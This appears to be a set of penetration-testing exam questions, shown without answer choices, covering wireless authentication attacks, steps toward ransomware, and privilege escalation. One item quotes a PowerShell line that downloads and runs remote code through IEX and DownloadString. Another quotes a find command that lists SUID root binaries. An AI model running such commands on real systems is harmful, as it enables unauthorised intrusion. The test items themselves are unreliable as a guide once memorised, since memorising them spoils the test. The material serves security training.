During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?
A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?
Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]
If ($1 -eq "administrator") {
echo IEX(New-Object Net.WebClient).Downloadstring(' ') | powershell -noprofile -}
Which of the following is the penetration tester most likely trying to do?
A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Which of the following is the penetration tester attempting to enumerate?